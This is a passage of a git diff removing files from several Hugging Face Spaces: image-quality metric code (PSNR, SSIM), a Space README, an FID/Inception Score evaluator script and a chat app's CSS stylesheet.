[0, 255]. - crop_border (int): Cropped pixels in each edge of an image. These - pixels are not involved in the PSNR calculation. - input_order (str): Whether the input order is 'HWC' or 'CHW'. - Default: 'HWC'. - test_y_channel (bool): Test on Y channel of YCbCr. Default: False. 
- - Returns: - float: psnr result. - """ - - assert img1.shape == img2.shape, (f'Image shapes are different: {img1.shape}, {img2.shape}.') - if input_order not in ['HWC', 'CHW']: - raise ValueError(f'Wrong input_order {input_order}. Supported input_orders are ' '"HWC" and "CHW"') - img1 = reorder_image(img1, input_order=input_order) - img2 = reorder_image(img2, input_order=input_order) - img1 = img1.astype(np.float64) - img2 = img2.astype(np.float64) - - if crop_border != 0: - img1 = img1[crop_border:-crop_border, crop_border:-crop_border, ...] - img2 = img2[crop_border:-crop_border, crop_border:-crop_border, ...] - - if test_y_channel: - img1 = to_y_channel(img1) - img2 = to_y_channel(img2) - - mse = np.mean((img1 - img2)**2) - if mse == 0: - return float('inf') - return 20. * np.log10(255. / np.sqrt(mse)) - - -def _ssim(img1, img2): - """Calculate SSIM (structural similarity) for one-channel images. - - It is called by func:`calculate_ssim`. - - Args: - img1 (ndarray): Images with range [0, 255] with order 'HWC'. - img2 (ndarray): Images with range [0, 255] with order 'HWC'. - - Returns: - float: ssim result. 
- """ - - C1 = (0.01 * 255)**2 - C2 = (0.03 * 255)**2 - - img1 = img1.astype(np.float64) - img2 = img2.astype(np.float64) - kernel = cv2.getGaussianKernel(11, 1.5) - window = np.outer(kernel, kernel.transpose()) - - mu1 = cv2.filter2D(img1, -1, window)[5:-5, 5:-5] - mu2 = cv2.filter2D(img2, -1, window)[5:-5, 5:-5] - mu1_sq = mu1**2 - mu2_sq = mu2**2 - mu1_mu2 = mu1 * mu2 - sigma1_sq = cv2.filter2D(img1**2, -1, window)[5:-5, 5:-5] - mu1_sq - sigma2_sq = cv2.filter2D(img2**2, -1, window)[5:-5, 5:-5] - mu2_sq - sigma12 = cv2.filter2D(img1 * img2, -1, window)[5:-5, 5:-5] - mu1_mu2 - - ssim_map = ((2 * mu1_mu2 + C1) * (2 * sigma12 + C2)) / ((mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2)) - return ssim_map.mean() - - -@METRIC_REGISTRY.register() -def calculate_ssim(img1, img2, crop_border, input_order='HWC', test_y_channel=False): - """Calculate SSIM (structural similarity). - - Ref: - Image quality assessment: From error visibility to structural similarity - - The results are the same as that of the official released MATLAB code in - https://ece.uwaterloo.ca/~z70wang/research/ssim/. - - For three-channel images, SSIM is calculated for each channel and then - averaged. - - Args: - img1 (ndarray): Images with range [0, 255]. - img2 (ndarray): Images with range [0, 255]. - crop_border (int): Cropped pixels in each edge of an image. These - pixels are not involved in the SSIM calculation. - input_order (str): Whether the input order is 'HWC' or 'CHW'. - Default: 'HWC'. - test_y_channel (bool): Test on Y channel of YCbCr. Default: False. - - Returns: - float: ssim result. - """ - - assert img1.shape == img2.shape, (f'Image shapes are differnet: {img1.shape}, {img2.shape}.') - if input_order not in ['HWC', 'CHW']: - raise ValueError(f'Wrong input_order {input_order}. 
Supported input_orders are ' '"HWC" and "CHW"') - img1 = reorder_image(img1, input_order=input_order) - img2 = reorder_image(img2, input_order=input_order) - img1 = img1.astype(np.float64) - img2 = img2.astype(np.float64) - - if crop_border != 0: - img1 = img1[crop_border:-crop_border, crop_border:-crop_border, ...] - img2 = img2[crop_border:-crop_border, crop_border:-crop_border, ...] - - if test_y_channel: - img1 = to_y_channel(img1) - img2 = to_y_channel(img2) - - ssims = [] - for i in range(img1.shape[2]): - ssims.append(_ssim(img1[..., i], img2[..., i])) - return np.array(ssims).mean() diff --git a/spaces/cscan/demucs/README.md b/spaces/cscan/demucs/README.md deleted file mode 100644 index 3a493fd8314ccbfede66b0826228fb4dc9bed219..0000000000000000000000000000000000000000 --- a/spaces/cscan/demucs/README.md +++ /dev/null @@ -1,39 +0,0 @@ ---- -title: Demucs -emoji: ⚡ -colorFrom: pink -colorTo: indigo -sdk: gradio -sdk_version: 3.15.0 -app_file: app.py -pinned: false -duplicated_from: akhaliq/demucs ---- - -# Configuration - -`title`: _string_ -Display title for the Space - -`emoji`: _string_ -Space emoji (emoji-only character allowed) - -`colorFrom`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`colorTo`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`sdk`: _string_ -Can be either `gradio` or `streamlit` - -`sdk_version` : _string_ -Only applicable for `streamlit` SDK. -See [doc](https://hf.co/docs/hub/spaces) for more info on supported versions. - -`app_file`: _string_ -Path to your main application file (which contains either `gradio` or `streamlit` Python code). -Path is relative to the root of the repository. - -`pinned`: _boolean_ -Whether the Space stays on top of your list. 
diff --git a/spaces/cvlab/zero123-live/ldm/modules/evaluate/adm_evaluator.py b/spaces/cvlab/zero123-live/ldm/modules/evaluate/adm_evaluator.py deleted file mode 100644 index 508cddf206e9aa8b2fa1de32e69a7b78acee13c0..0000000000000000000000000000000000000000 --- a/spaces/cvlab/zero123-live/ldm/modules/evaluate/adm_evaluator.py +++ /dev/null @@ -1,676 +0,0 @@ -import argparse -import io -import os -import random -import warnings -import zipfile -from abc import ABC, abstractmethod -from contextlib import contextmanager -from functools import partial -from multiprocessing import cpu_count -from multiprocessing.pool import ThreadPool -from typing import Iterable, Optional, Tuple -import yaml - -import numpy as np -import requests -import tensorflow.compat.v1 as tf -from scipy import linalg -from tqdm.auto import tqdm - -INCEPTION_V3_URL = "https://openaipublic.blob.core.windows.net/diffusion/jul-2021/ref_batches/classify_image_graph_def.pb" -INCEPTION_V3_PATH = "classify_image_graph_def.pb" - -FID_POOL_NAME = "pool_3:0" -FID_SPATIAL_NAME = "mixed_6/conv:0" - -REQUIREMENTS = f"This script has the following requirements: \n" \ - 'tensorflow-gpu>=2.0' + "\n" + 'scipy' + "\n" + "requests" + "\n" + "tqdm" - - -def main(): - parser = argparse.ArgumentParser() - parser.add_argument("--ref_batch", help="path to reference batch npz file") - parser.add_argument("--sample_batch", help="path to sample batch npz file") - args = parser.parse_args() - - config = tf.ConfigProto( - allow_soft_placement=True # allows DecodeJpeg to run on CPU in Inception graph - ) - config.gpu_options.allow_growth = True - evaluator = Evaluator(tf.Session(config=config)) - - print("warming up TensorFlow...") - # This will cause TF to print a bunch of verbose stuff now rather - # than after the next print(), to help prevent confusion. 
- evaluator.warmup() - - print("computing reference batch activations...") - ref_acts = evaluator.read_activations(args.ref_batch) - print("computing/reading reference batch statistics...") - ref_stats, ref_stats_spatial = evaluator.read_statistics(args.ref_batch, ref_acts) - - print("computing sample batch activations...") - sample_acts = evaluator.read_activations(args.sample_batch) - print("computing/reading sample batch statistics...") - sample_stats, sample_stats_spatial = evaluator.read_statistics(args.sample_batch, sample_acts) - - print("Computing evaluations...") - is_ = evaluator.compute_inception_score(sample_acts[0]) - print("Inception Score:", is_) - fid = sample_stats.frechet_distance(ref_stats) - print("FID:", fid) - sfid = sample_stats_spatial.frechet_distance(ref_stats_spatial) - print("sFID:", sfid) - prec, recall = evaluator.compute_prec_recall(ref_acts[0], sample_acts[0]) - print("Precision:", prec) - print("Recall:", recall) - - savepath = '/'.join(args.sample_batch.split('/')[:-1]) - results_file = os.path.join(savepath,'evaluation_metrics.yaml') - print(f'Saving evaluation results to "{results_file}"') - - results = { - 'IS': is_, - 'FID': fid, - 'sFID': sfid, - 'Precision:':prec, - 'Recall': recall - } - - with open(results_file, 'w') as f: - yaml.dump(results, f, default_flow_style=False) - -class InvalidFIDException(Exception): - pass - - -class FIDStatistics: - def __init__(self, mu: np.ndarray, sigma: np.ndarray): - self.mu = mu - self.sigma = sigma - - def frechet_distance(self, other, eps=1e-6): - """ - Compute the Frechet distance between two sets of statistics. 
- """ - # https://github.com/bioinf-jku/TTUR/blob/73ab375cdf952a12686d9aa7978567771084da42/fid.py#L132 - mu1, sigma1 = self.mu, self.sigma - mu2, sigma2 = other.mu, other.sigma - - mu1 = np.atleast_1d(mu1) - mu2 = np.atleast_1d(mu2) - - sigma1 = np.atleast_2d(sigma1) - sigma2 = np.atleast_2d(sigma2) - - assert ( - mu1.shape == mu2.shape - ), f"Training and test mean vectors have different lengths: {mu1.shape}, {mu2.shape}" - assert ( - sigma1.shape == sigma2.shape - ), f"Training and test covariances have different dimensions: {sigma1.shape}, {sigma2.shape}" - - diff = mu1 - mu2 - - # product might be almost singular - covmean, _ = linalg.sqrtm(sigma1.dot(sigma2), disp=False) - if not np.isfinite(covmean).all(): - msg = ( - "fid calculation produces singular product; adding %s to diagonal of cov estimates" - % eps - ) - warnings.warn(msg) - offset = np.eye(sigma1.shape[0]) * eps - covmean = linalg.sqrtm((sigma1 + offset).dot(sigma2 + offset)) - - # numerical error might give slight imaginary component - if np.iscomplexobj(covmean): - if not np.allclose(np.diagonal(covmean).imag, 0, atol=1e-3): - m = np.max(np.abs(covmean.imag)) - raise ValueError("Imaginary component {}".format(m)) - covmean = covmean.real - - tr_covmean = np.trace(covmean) - - return diff.dot(diff) + np.trace(sigma1) + np.trace(sigma2) - 2 * tr_covmean - - -class Evaluator: - def __init__( - self, - session, - batch_size=64, - softmax_batch_size=512, - ): - self.sess = session - self.batch_size = batch_size - self.softmax_batch_size = softmax_batch_size - self.manifold_estimator = ManifoldEstimator(session) - with self.sess.graph.as_default(): - self.image_input = tf.placeholder(tf.float32, shape=[None, None, None, 3]) - self.softmax_input = tf.placeholder(tf.float32, shape=[None, 2048]) - self.pool_features, self.spatial_features = _create_feature_graph(self.image_input) - self.softmax = _create_softmax_graph(self.softmax_input) - - def warmup(self): - self.compute_activations(np.zeros([1, 8, 64, 
64, 3])) - - def read_activations(self, npz_path: str) -> Tuple[np.ndarray, np.ndarray]: - with open_npz_array(npz_path, "arr_0") as reader: - return self.compute_activations(reader.read_batches(self.batch_size)) - - def compute_activations(self, batches: Iterable[np.ndarray], silent=False) -> Tuple[np.ndarray, np.ndarray]: - """ - Compute image features for downstream evals. - - :param batches: an iterator over NHWC numpy arrays in [0, 255]. - :return: a tuple of numpy arrays of shape [N x X], where X is a feature - dimension. The tuple is (pool_3, spatial). - """ - preds = [] - spatial_preds = [] - it = batches if silent else tqdm(batches) - for batch in it: - batch = batch.astype(np.float32) - pred, spatial_pred = self.sess.run( - [self.pool_features, self.spatial_features], {self.image_input: batch} - ) - preds.append(pred.reshape([pred.shape[0], -1])) - spatial_preds.append(spatial_pred.reshape([spatial_pred.shape[0], -1])) - return ( - np.concatenate(preds, axis=0), - np.concatenate(spatial_preds, axis=0), - ) - - def read_statistics( - self, npz_path: str, activations: Tuple[np.ndarray, np.ndarray] - ) -> Tuple[FIDStatistics, FIDStatistics]: - obj = np.load(npz_path) - if "mu" in list(obj.keys()): - return FIDStatistics(obj["mu"], obj["sigma"]), FIDStatistics( - obj["mu_s"], obj["sigma_s"] - ) - return tuple(self.compute_statistics(x) for x in activations) - - def compute_statistics(self, activations: np.ndarray) -> FIDStatistics: - mu = np.mean(activations, axis=0) - sigma = np.cov(activations, rowvar=False) - return FIDStatistics(mu, sigma) - - def compute_inception_score(self, activations: np.ndarray, split_size: int = 5000) -> float: - softmax_out = [] - for i in range(0, len(activations), self.softmax_batch_size): - acts = activations[i : i + self.softmax_batch_size] - softmax_out.append(self.sess.run(self.softmax, feed_dict={self.softmax_input: acts})) - preds = np.concatenate(softmax_out, axis=0) - # 
https://github.com/openai/improved-gan/blob/4f5d1ec5c16a7eceb206f42bfc652693601e1d5c/inception_score/model.py#L46 - scores = [] - for i in range(0, len(preds), split_size): - part = preds[i : i + split_size] - kl = part * (np.log(part) - np.log(np.expand_dims(np.mean(part, 0), 0))) - kl = np.mean(np.sum(kl, 1)) - scores.append(np.exp(kl)) - return float(np.mean(scores)) - - def compute_prec_recall( - self, activations_ref: np.ndarray, activations_sample: np.ndarray - ) -> Tuple[float, float]: - radii_1 = self.manifold_estimator.manifold_radii(activations_ref) - radii_2 = self.manifold_estimator.manifold_radii(activations_sample) - pr = self.manifold_estimator.evaluate_pr( - activations_ref, radii_1, activations_sample, radii_2 - ) - return (float(pr[0][0]), float(pr[1][0])) - - -class ManifoldEstimator: - """ - A helper for comparing manifolds of feature vectors. - - Adapted from https://github.com/kynkaat/improved-precision-and-recall-metric/blob/f60f25e5ad933a79135c783fcda53de30f42c9b9/precision_recall.py#L57 - """ - - def __init__( - self, - session, - row_batch_size=10000, - col_batch_size=10000, - nhood_sizes=(3,), - clamp_to_percentile=None, - eps=1e-5, - ): - """ - Estimate the manifold of given feature vectors. - - :param session: the TensorFlow session. - :param row_batch_size: row batch size to compute pairwise distances - (parameter to trade-off between memory usage and performance). - :param col_batch_size: column batch size to compute pairwise distances. - :param nhood_sizes: number of neighbors used to estimate the manifold. - :param clamp_to_percentile: prune hyperspheres that have radius larger than - the given percentile. - :param eps: small number for numerical stability. 
- """ - self.distance_block = DistanceBlock(session) - self.row_batch_size = row_batch_size - self.col_batch_size = col_batch_size - self.nhood_sizes = nhood_sizes - self.num_nhoods = len(nhood_sizes) - self.clamp_to_percentile = clamp_to_percentile - self.eps = eps - - def warmup(self): - feats, radii = ( - np.zeros([1, 2048], dtype=np.float32), - np.zeros([1, 1], dtype=np.float32), - ) - self.evaluate_pr(feats, radii, feats, radii) - - def manifold_radii(self, features: np.ndarray) -> np.ndarray: - num_images = len(features) - - # Estimate manifold of features by calculating distances to k-NN of each sample. - radii = np.zeros([num_images, self.num_nhoods], dtype=np.float32) - distance_batch = np.zeros([self.row_batch_size, num_images], dtype=np.float32) - seq = np.arange(max(self.nhood_sizes) + 1, dtype=np.int32) - - for begin1 in range(0, num_images, self.row_batch_size): - end1 = min(begin1 + self.row_batch_size, num_images) - row_batch = features[begin1:end1] - - for begin2 in range(0, num_images, self.col_batch_size): - end2 = min(begin2 + self.col_batch_size, num_images) - col_batch = features[begin2:end2] - - # Compute distances between batches. - distance_batch[ - 0 : end1 - begin1, begin2:end2 - ] = self.distance_block.pairwise_distances(row_batch, col_batch) - - # Find the k-nearest neighbor from the current batch. - radii[begin1:end1, :] = np.concatenate( - [ - x[:, self.nhood_sizes] - for x in _numpy_partition(distance_batch[0 : end1 - begin1, :], seq, axis=1) - ], - axis=0, - ) - - if self.clamp_to_percentile is not None: - max_distances = np.percentile(radii, self.clamp_to_percentile, axis=0) - radii[radii > max_distances] = 0 - return radii - - def evaluate(self, features: np.ndarray, radii: np.ndarray, eval_features: np.ndarray): - """ - Evaluate if new feature vectors are at the manifold. 
- """ - num_eval_images = eval_features.shape[0] - num_ref_images = radii.shape[0] - distance_batch = np.zeros([self.row_batch_size, num_ref_images], dtype=np.float32) - batch_predictions = np.zeros([num_eval_images, self.num_nhoods], dtype=np.int32) - max_realism_score = np.zeros([num_eval_images], dtype=np.float32) - nearest_indices = np.zeros([num_eval_images], dtype=np.int32) - - for begin1 in range(0, num_eval_images, self.row_batch_size): - end1 = min(begin1 + self.row_batch_size, num_eval_images) - feature_batch = eval_features[begin1:end1] - - for begin2 in range(0, num_ref_images, self.col_batch_size): - end2 = min(begin2 + self.col_batch_size, num_ref_images) - ref_batch = features[begin2:end2] - - distance_batch[ - 0 : end1 - begin1, begin2:end2 - ] = self.distance_block.pairwise_distances(feature_batch, ref_batch) - - # From the minibatch of new feature vectors, determine if they are in the estimated manifold. - # If a feature vector is inside a hypersphere of some reference sample, then - # the new sample lies at the estimated manifold. - # The radii of the hyperspheres are determined from distances of neighborhood size k. - samples_in_manifold = distance_batch[0 : end1 - begin1, :, None] <= radii - batch_predictions[begin1:end1] = np.any(samples_in_manifold, axis=1).astype(np.int32) - - max_realism_score[begin1:end1] = np.max( - radii[:, 0] / (distance_batch[0 : end1 - begin1, :] + self.eps), axis=1 - ) - nearest_indices[begin1:end1] = np.argmin(distance_batch[0 : end1 - begin1, :], axis=1) - - return { - "fraction": float(np.mean(batch_predictions)), - "batch_predictions": batch_predictions, - "max_realisim_score": max_realism_score, - "nearest_indices": nearest_indices, - } - - def evaluate_pr( - self, - features_1: np.ndarray, - radii_1: np.ndarray, - features_2: np.ndarray, - radii_2: np.ndarray, - ) -> Tuple[np.ndarray, np.ndarray]: - """ - Evaluate precision and recall efficiently. 
- - :param features_1: [N1 x D] feature vectors for reference batch. - :param radii_1: [N1 x K1] radii for reference vectors. - :param features_2: [N2 x D] feature vectors for the other batch. - :param radii_2: [N2 x K2] radii for other vectors. - :return: a tuple of arrays for (precision, recall): - - precision: an np.ndarray of length K1 - - recall: an np.ndarray of length K2 - """ - features_1_status = np.zeros([len(features_1), radii_2.shape[1]], dtype=bool) - features_2_status = np.zeros([len(features_2), radii_1.shape[1]], dtype=bool) - for begin_1 in range(0, len(features_1), self.row_batch_size): - end_1 = begin_1 + self.row_batch_size - batch_1 = features_1[begin_1:end_1] - for begin_2 in range(0, len(features_2), self.col_batch_size): - end_2 = begin_2 + self.col_batch_size - batch_2 = features_2[begin_2:end_2] - batch_1_in, batch_2_in = self.distance_block.less_thans( - batch_1, radii_1[begin_1:end_1], batch_2, radii_2[begin_2:end_2] - ) - features_1_status[begin_1:end_1] |= batch_1_in - features_2_status[begin_2:end_2] |= batch_2_in - return ( - np.mean(features_2_status.astype(np.float64), axis=0), - np.mean(features_1_status.astype(np.float64), axis=0), - ) - - -class DistanceBlock: - """ - Calculate pairwise distances between vectors. - - Adapted from https://github.com/kynkaat/improved-precision-and-recall-metric/blob/f60f25e5ad933a79135c783fcda53de30f42c9b9/precision_recall.py#L34 - """ - - def __init__(self, session): - self.session = session - - # Initialize TF graph to calculate pairwise distances. 
- with session.graph.as_default(): - self._features_batch1 = tf.placeholder(tf.float32, shape=[None, None]) - self._features_batch2 = tf.placeholder(tf.float32, shape=[None, None]) - distance_block_16 = _batch_pairwise_distances( - tf.cast(self._features_batch1, tf.float16), - tf.cast(self._features_batch2, tf.float16), - ) - self.distance_block = tf.cond( - tf.reduce_all(tf.math.is_finite(distance_block_16)), - lambda: tf.cast(distance_block_16, tf.float32), - lambda: _batch_pairwise_distances(self._features_batch1, self._features_batch2), - ) - - # Extra logic for less thans. - self._radii1 = tf.placeholder(tf.float32, shape=[None, None]) - self._radii2 = tf.placeholder(tf.float32, shape=[None, None]) - dist32 = tf.cast(self.distance_block, tf.float32)[..., None] - self._batch_1_in = tf.math.reduce_any(dist32 <= self._radii2, axis=1) - self._batch_2_in = tf.math.reduce_any(dist32 <= self._radii1[:, None], axis=0) - - def pairwise_distances(self, U, V): - """ - Evaluate pairwise distances between two batches of feature vectors. - """ - return self.session.run( - self.distance_block, - feed_dict={self._features_batch1: U, self._features_batch2: V}, - ) - - def less_thans(self, batch_1, radii_1, batch_2, radii_2): - return self.session.run( - [self._batch_1_in, self._batch_2_in], - feed_dict={ - self._features_batch1: batch_1, - self._features_batch2: batch_2, - self._radii1: radii_1, - self._radii2: radii_2, - }, - ) - - -def _batch_pairwise_distances(U, V): - """ - Compute pairwise distances between two batches of feature vectors. - """ - with tf.variable_scope("pairwise_dist_block"): - # Squared norms of each row in U and V. - norm_u = tf.reduce_sum(tf.square(U), 1) - norm_v = tf.reduce_sum(tf.square(V), 1) - - # norm_u as a column and norm_v as a row vectors. - norm_u = tf.reshape(norm_u, [-1, 1]) - norm_v = tf.reshape(norm_v, [1, -1]) - - # Pairwise squared Euclidean distances. 
- D = tf.maximum(norm_u - 2 * tf.matmul(U, V, False, True) + norm_v, 0.0) - - return D - - -class NpzArrayReader(ABC): - @abstractmethod - def read_batch(self, batch_size: int) -> Optional[np.ndarray]: - pass - - @abstractmethod - def remaining(self) -> int: - pass - - def read_batches(self, batch_size: int) -> Iterable[np.ndarray]: - def gen_fn(): - while True: - batch = self.read_batch(batch_size) - if batch is None: - break - yield batch - - rem = self.remaining() - num_batches = rem // batch_size + int(rem % batch_size != 0) - return BatchIterator(gen_fn, num_batches) - - -class BatchIterator: - def __init__(self, gen_fn, length): - self.gen_fn = gen_fn - self.length = length - - def __len__(self): - return self.length - - def __iter__(self): - return self.gen_fn() - - -class StreamingNpzArrayReader(NpzArrayReader): - def __init__(self, arr_f, shape, dtype): - self.arr_f = arr_f - self.shape = shape - self.dtype = dtype - self.idx = 0 - - def read_batch(self, batch_size: int) -> Optional[np.ndarray]: - if self.idx >= self.shape[0]: - return None - - bs = min(batch_size, self.shape[0] - self.idx) - self.idx += bs - - if self.dtype.itemsize == 0: - return np.ndarray([bs, *self.shape[1:]], dtype=self.dtype) - - read_count = bs * np.prod(self.shape[1:]) - read_size = int(read_count * self.dtype.itemsize) - data = _read_bytes(self.arr_f, read_size, "array data") - return np.frombuffer(data, dtype=self.dtype).reshape([bs, *self.shape[1:]]) - - def remaining(self) -> int: - return max(0, self.shape[0] - self.idx) - - -class MemoryNpzArrayReader(NpzArrayReader): - def __init__(self, arr): - self.arr = arr - self.idx = 0 - - @classmethod - def load(cls, path: str, arr_name: str): - with open(path, "rb") as f: - arr = np.load(f)[arr_name] - return cls(arr) - - def read_batch(self, batch_size: int) -> Optional[np.ndarray]: - if self.idx >= self.arr.shape[0]: - return None - - res = self.arr[self.idx : self.idx + batch_size] - self.idx += batch_size - return res - - def 
remaining(self) -> int: - return max(0, self.arr.shape[0] - self.idx) - - -@contextmanager -def open_npz_array(path: str, arr_name: str) -> NpzArrayReader: - with _open_npy_file(path, arr_name) as arr_f: - version = np.lib.format.read_magic(arr_f) - if version == (1, 0): - header = np.lib.format.read_array_header_1_0(arr_f) - elif version == (2, 0): - header = np.lib.format.read_array_header_2_0(arr_f) - else: - yield MemoryNpzArrayReader.load(path, arr_name) - return - shape, fortran, dtype = header - if fortran or dtype.hasobject: - yield MemoryNpzArrayReader.load(path, arr_name) - else: - yield StreamingNpzArrayReader(arr_f, shape, dtype) - - -def _read_bytes(fp, size, error_template="ran out of data"): - """ - Copied from: https://github.com/numpy/numpy/blob/fb215c76967739268de71aa4bda55dd1b062bc2e/numpy/lib/format.py#L788-L886 - - Read from file-like object until size bytes are read. - Raises ValueError if not EOF is encountered before size bytes are read. - Non-blocking objects only supported if they derive from io objects. - Required as e.g. ZipExtFile in python 2.6 can return less data than - requested. - """ - data = bytes() - while True: - # io files (default in python3) return None or raise on - # would-block, python2 file will truncate, probably nothing can be - # done about that. 
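The `_read_bytes` helper copied from NumPy (below) exists because `fp.read(n)` on zip-backed streams may legally return fewer than `n` bytes. The core contract — loop until exactly `size` bytes arrive or fail loudly on EOF — can be sketched on its own like this (an illustrative standalone version, not the NumPy original):

```python
import io

def read_exact(fp, size):
    """Read exactly `size` bytes from a file-like object, looping over
    short reads; raise ValueError on premature EOF."""
    data = b""
    while len(data) < size:
        chunk = fp.read(size - len(data))
        if not chunk:  # b"" signals EOF on blocking streams
            raise ValueError(f"EOF: expected {size} bytes, got {len(data)}")
        data += chunk
    return data

buf = io.BytesIO(b"abcdefgh")
print(read_exact(buf, 4))  # b'abcd'
```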
note that regular files can't be non-blocking - try: - r = fp.read(size - len(data)) - data += r - if len(r) == 0 or len(data) == size: - break - except io.BlockingIOError: - pass - if len(data) != size: - msg = "EOF: reading %s, expected %d bytes got %d" - raise ValueError(msg % (error_template, size, len(data))) - else: - return data - - -@contextmanager -def _open_npy_file(path: str, arr_name: str): - with open(path, "rb") as f: - with zipfile.ZipFile(f, "r") as zip_f: - if f"{arr_name}.npy" not in zip_f.namelist(): - raise ValueError(f"missing {arr_name} in npz file") - with zip_f.open(f"{arr_name}.npy", "r") as arr_f: - yield arr_f - - -def _download_inception_model(): - if os.path.exists(INCEPTION_V3_PATH): - return - print("downloading InceptionV3 model...") - with requests.get(INCEPTION_V3_URL, stream=True) as r: - r.raise_for_status() - tmp_path = INCEPTION_V3_PATH + ".tmp" - with open(tmp_path, "wb") as f: - for chunk in tqdm(r.iter_content(chunk_size=8192)): - f.write(chunk) - os.rename(tmp_path, INCEPTION_V3_PATH) - - -def _create_feature_graph(input_batch): - _download_inception_model() - prefix = f"{random.randrange(2**32)}_{random.randrange(2**32)}" - with open(INCEPTION_V3_PATH, "rb") as f: - graph_def = tf.GraphDef() - graph_def.ParseFromString(f.read()) - pool3, spatial = tf.import_graph_def( - graph_def, - input_map={f"ExpandDims:0": input_batch}, - return_elements=[FID_POOL_NAME, FID_SPATIAL_NAME], - name=prefix, - ) - _update_shapes(pool3) - spatial = spatial[..., :7] - return pool3, spatial - - -def _create_softmax_graph(input_batch): - _download_inception_model() - prefix = f"{random.randrange(2**32)}_{random.randrange(2**32)}" - with open(INCEPTION_V3_PATH, "rb") as f: - graph_def = tf.GraphDef() - graph_def.ParseFromString(f.read()) - (matmul,) = tf.import_graph_def( - graph_def, return_elements=[f"softmax/logits/MatMul"], name=prefix - ) - w = matmul.inputs[1] - logits = tf.matmul(input_batch, w) - return tf.nn.softmax(logits) - - -def 
_update_shapes(pool3): - # https://github.com/bioinf-jku/TTUR/blob/73ab375cdf952a12686d9aa7978567771084da42/fid.py#L50-L63 - ops = pool3.graph.get_operations() - for op in ops: - for o in op.outputs: - shape = o.get_shape() - if shape._dims is not None: # pylint: disable=protected-access - # shape = [s.value for s in shape] TF 1.x - shape = [s for s in shape] # TF 2.x - new_shape = [] - for j, s in enumerate(shape): - if s == 1 and j == 0: - new_shape.append(None) - else: - new_shape.append(s) - o.__dict__["_shape_val"] = tf.TensorShape(new_shape) - return pool3 - - -def _numpy_partition(arr, kth, **kwargs): - num_workers = min(cpu_count(), len(arr)) - chunk_size = len(arr) // num_workers - extra = len(arr) % num_workers - - start_idx = 0 - batches = [] - for i in range(num_workers): - size = chunk_size + (1 if i < extra else 0) - batches.append(arr[start_idx : start_idx + size]) - start_idx += size - - with ThreadPool(num_workers) as pool: - return list(pool.map(partial(np.partition, kth=kth, **kwargs), batches)) - - -if __name__ == "__main__": - print(REQUIREMENTS) - main() diff --git a/spaces/dachenchen/HiWantJoin/assets/custom.css b/spaces/dachenchen/HiWantJoin/assets/custom.css deleted file mode 100644 index af5e9f2118b843b3bbd7627ed45e970c20b13bef..0000000000000000000000000000000000000000 --- a/spaces/dachenchen/HiWantJoin/assets/custom.css +++ /dev/null @@ -1,353 +0,0 @@ -:root { - --chatbot-color-light: #F3F3F3; - --chatbot-color-dark: #121111; -} - -#app_title { - font-weight: var(--prose-header-text-weight); - font-size: var(--text-xxl); - line-height: 1.3; - text-align: left; - margin-top: 6px; - white-space: nowrap; -} -#description { - text-align: center; - margin:16px 0 -} - -/* 覆盖gradio的页脚信息QAQ */ -/* footer { - display: none !important; -} */ -#footer { - text-align: center; -} -#footer div { - display: inline-block; -} -#footer .versions{ - font-size: 85%; - opacity: 0.85; -} - -#float_display { - position: absolute; - max-height: 30px; -} -/* 
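The `_numpy_partition` helper in the Python section above splits the work row-wise into near-equal batches (spreading the remainder over the first few batches) before running `np.partition` in a thread pool. A self-contained sketch of that chunking pattern, using `divmod` for the base size and remainder (an illustrative rewrite, not the deleted code verbatim):

```python
import numpy as np
from functools import partial
from multiprocessing import cpu_count
from multiprocessing.pool import ThreadPool

def chunked_partition(arr, kth):
    """Split `arr` row-wise into near-equal batches and np.partition each
    batch in a thread pool; the first `extra` batches get one extra row."""
    num_workers = min(cpu_count(), len(arr))
    base, extra = divmod(len(arr), num_workers)
    batches, start = [], 0
    for i in range(num_workers):
        size = base + (1 if i < extra else 0)
        batches.append(arr[start:start + size])
        start += size
    with ThreadPool(num_workers) as pool:
        return list(pool.map(partial(np.partition, kth=kth), batches))

out = np.concatenate(chunked_partition(np.array([[3, 1, 2], [9, 7, 8]]), 1))
print(out[:, 1])  # the kth (median) element of each row: [2 8]
```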
user_info */ -#user_info { - white-space: nowrap; - position: absolute; left: 8em; top: .2em; - z-index: var(--layer-2); - box-shadow: var(--block-shadow); - border: none; border-radius: var(--block-label-radius); - background: var(--color-accent); - padding: var(--block-label-padding); - font-size: var(--block-label-text-size); line-height: var(--line-sm); - width: auto; min-height: 30px!important; - opacity: 1; - transition: opacity 0.3s ease-in-out; -} -#user_info .wrap { - opacity: 0; -} -#user_info p { - color: white; - font-weight: var(--block-label-text-weight); -} -#user_info.hideK { - opacity: 0; - transition: opacity 1s ease-in-out; -} - -/* status_display */ -#status_display { - display: flex; - min-height: 2em; - align-items: flex-end; - justify-content: flex-end; -} -#status_display p { - font-size: .85em; - font-family: monospace; - color: var(--body-text-color-subdued); -} - -#status_display { - transition: all 0.6s; -} -#chuanhu_chatbot { - transition: height 0.3s ease; -} - -/* usage_display */ -.insert_block { - position: relative; - margin: 0; - padding: .5em 1em; - box-shadow: var(--block-shadow); - border-width: var(--block-border-width); - border-color: var(--block-border-color); - border-radius: var(--block-radius); - background: var(--block-background-fill); - width: 100%; - line-height: var(--line-sm); - min-height: 2em; -} -#usage_display p, #usage_display span { - margin: 0; - font-size: .85em; - color: var(--body-text-color-subdued); -} -.progress-bar { - background-color: var(--input-background-fill);; - margin: 0 1em; - height: 20px; - border-radius: 10px; - overflow: hidden; -} -.progress { - background-color: var(--block-title-background-fill); - height: 100%; - border-radius: 10px; - text-align: right; - transition: width 0.5s ease-in-out; -} -.progress-text { - /* color: white; */ - color: var(--color-accent) !important; - font-size: 1em !important; - font-weight: bold; - padding-right: 10px; - line-height: 20px; -} - -.apSwitch { 
